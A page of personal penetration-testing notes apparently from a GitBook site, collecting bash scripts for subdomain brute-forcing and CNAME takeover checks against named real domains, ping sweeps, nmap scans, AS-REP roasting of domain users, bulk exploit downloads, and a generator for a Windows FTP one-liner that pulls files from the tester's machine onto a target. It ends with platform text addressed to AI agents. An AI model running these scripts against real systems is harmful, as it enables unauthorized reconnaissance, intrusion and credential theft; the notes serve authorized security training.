> For the complete documentation index, see [llms.txt](https://davidtancredi.gitbook.io/pentesting-notes/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://davidtancredi.gitbook.io/pentesting-notes/r3dcl1ff/tools/bash-voodoo.md). # Bash Voodoo **#Figure out whether the last command worked or not** ``` echo $? ``` **#Find out whether a given domain resolves** ``` if host target.com; then echo “It Resolves”; fi ``` **#enumerate subdomains** ``` while read sub; do echo "$sub.sbtuk.net"; done < subdomains.txt #touch a subdomains.txtseparetely, file contains: admin test qa dev www m blog ``` **#Bruteforce subdomains | chmod 777 and run** ``` #!/bin/bash while read sub; do if host $sub.yahoo.com; then echo "$sub.yahoo.com" fi done < subdomains.txt ``` **#Resolving CNAMES script | cnames.sh** ``` ##Use the subdomains.txt list above to enumerate for hostile takeover## #!/bin/bash domain=$1 while read sub; do cname=$(host -t CNAME $sub.$domain | grep 'an alias' | awk '{print $NF}') if [ -z "$cname" ]; then continue fi if ! host $cname &> /dev/null; then echo "$cname did not resolve ($sub.$domain)"; fi done ``` **#Concatenate the scripts to bruteforce yahoo.com** ``` cat subdomains.txt | ./cnames.sh yahoo.com ``` **#export IP variable** ``` export IP=192.168.101.57 nmap -sC -sV -oA quick $IP ``` **#Repeat the last command** ``` !1 OR !! ``` **#Reverse-i search** ``` press ctrl + r , then type dpkg (to look for dpkg in history) ``` **#History tricks** ``` export HISTCONTROL=ignoredups #ignores duplicate commands export HISTIGNORE="&:ls:[bf]g:exit:history" #ignores common commands ``` **#Assign a command to a variable** ``` user=$(whoami) echo $user ``` **#URL generator script** ``` #!/bin/bash for i in {tokyo,beijing,newyork,rome,bangkok,osaka}; do for j in {0..9}; do for k in {0..9}; do echo "http://example/com/$i/$j/$k" >> password.txt done done done ``` **#ping sweep script** ``` #!/bin/bash #if you do a ping-sweep with host the command will take about a second to complete. #And if you run that against 255 hosts I will take a long time to complete. To avoid this we can just deamonize every execution to make it faster. #We #use the & to daemonize it. #!/bin/bash for ip in $(cat ips.txt); do ping -c 1 $ip & done ``` **#Print out all IPs in a given subnet** ``` for ip in $(seq 1 10); do echo 10.11.1.$ip; done #Variation with braces instead of seq to specify a range for i in {0..255}; do echo 10.11.1.$i;done #Same output but using a while loop instead -lt flag stands for “less than” (will print out 1 - 9 and exclude 10) #!/bin/bash # while loop example counter=1 while [ $counter -lt 10 ] do echo "10.11.1.$counter" ((counter++)) done #Create a list of hosts and redirect output to a list.txt #This command will print out all possible addresses in Lab subnet for i in {0..254}; do echo 10.11.1.$i;done #Redirecting output to a file for i in {1..10}; do echo 10.11.1.$i >> list.txt;done ``` **#wget a given target and use grep/bash to filter for subdomains** ``` sudo wget www.megacorpone.com #use grep “href=” to extract all the lines in index.html that contain HTML links grep "href=" index.html #beautify the output grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpone\.com" | awk -F "http://" '{print $2}' #using cut to only leave subdomains grep "href=" index.html | grep "\.megacorpone" | grep -v "www\.megacorpone\.com" | awk -F "http://" '{print $2}' | cut -d "/" -f 1 #grep -o returns the string defined in the regular expression grep -o '[^/]*\.megacorpone\.com' index.html | sort -u > list.txt ‘[^/]*\.megacorpone\.com’ this is the string we are looking for ``` **#DNS recon scripts** ``` for i in {0..255}; do echo 10.11.1.$i >> list.txt;done Then: for url in $(cat list.txt); do host $url; done #Parse through output grepping for available addresses for url in $(cat list.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u
 ``` **#Using curl** ``` #Similar to wget technique but with curl curl -s https://www.cisco.com | grep 'href=' | cut -d'/' -f3 | grep 'cisco.com' | cut -d'"' -f1 | sort -u > test #Beautify output curl -s https://www.cisco.com | grep -o '[A-Za-z0-9\._-]*\.*cisco\.com' | sort -u #Parsing with grep for url in $(curl -s https://www.cisco.com | grep -o '[A-Za-z0-9\._-]*\.*cisco\.com' | sort -u); do host $url | grep 'has address' | cut -d' ' -f4; done ``` **#Running Autorecon against an entire subnet** ``` #Use nmap sweep to check all ports nmap -A --open 10.11.1.0/24 -oG Available_nmap-scan_10.11.1.1-254 cat Available_nmap-scan_10.11.1.1-254 | grep -v "Nmap" | awk '{print $2}' | sort -u #Redirect output to another file --> targets.txt cat Available_nmap-scan_10.11.1.1-254 | grep -v "Nmap" | awk '{print $2}' | sort -u > targets.txt autorecon targets.txt ``` **#Workaround to use nmapAutomator against a subnet** ``` for ip in $(cat targets.txt); do bash /usr/local/bin/nmapAutomator.sh --host $ip --type Full -o scan.txt & done ``` **#Reverse lookup script** ``` #!/bin/bash i="1" echo "Please enter first 3 octets. e.g 192.168.1" read subnet while [ $i -le 254 ]; do host -l "$subnet"."$i" i=$(( $i + 1)) done ``` #### #check ASREPRoast for all domain users (without credentials) ``` for user in $(cat users.txt); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 domain/${user} | grep -v Impacket; done ``` **#Bash customization | edit /etc/bash.bashrc with root privileges** ``` nano /etc/bash.bashrc alias gobustLin = sudo gobuster dir -e u --url http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x php,bak,html,txt,zip ``` **#Search for a given exploit and download all matches** ``` #!/bin/bash #replace redcliff debian with keywords to search for for e in $(searchsploit redcliff debian -w -t | grep http | cut -f 2 -d "|") do exp_name=$(echo $e | cut -d "/" -f 5) url=$(echo $e | sed 's/exploits/raw/') wget -q --no-check-certificate $url -O $exp_name done ``` \#FTP script to spawn a one-liner for downloading ``` #!/bin/bash #Outputs a one liner to paste into a Windows host to create and run a ftp script to download a given file. # Text coloring yellow='\033[1;33m' red='\033[1;91m' nc='\033[0m' echo echo -e "${yellow}This gives you a one liner to paste into a Windows host to create and run a ftp script." echo # change tun0 to your interface if needed ip=$(ifconfig tun0 | grep inet | cut -d" " -f10 | head -1) echo -e "Using IP address of tun0: $ip" echo echo -e "What port do you want the ftp server to run on? Hit enter for default of 21${nc}" read port if [[ -z "$port" ]]; then ftpport="21" else ftpport="$port" fi echo echo -e "${yellow}Enter the username: ${nc}" read user echo echo -e "${yellow}Enter the password: ${nc}" read pass echo echo -e "${yellow}What file do you want the remote host to download?${nc}" read file echo echo -e "${yellow}Paste the below to create a ftp script and run it:${nc}" echo echo "echo open $ip $ftpport>ftp.txt&&echo $user>>ftp.txt&&echo $pass>>ftp.txt&&echo bin>>ftp.txt&&echo get $file>>ftp.txt&&echo bye>>ftp.txt&&ftp -s:ftp.txt" echo ``` --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://davidtancredi.gitbook.io/pentesting-notes/r3dcl1ff/tools/bash-voodoo.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.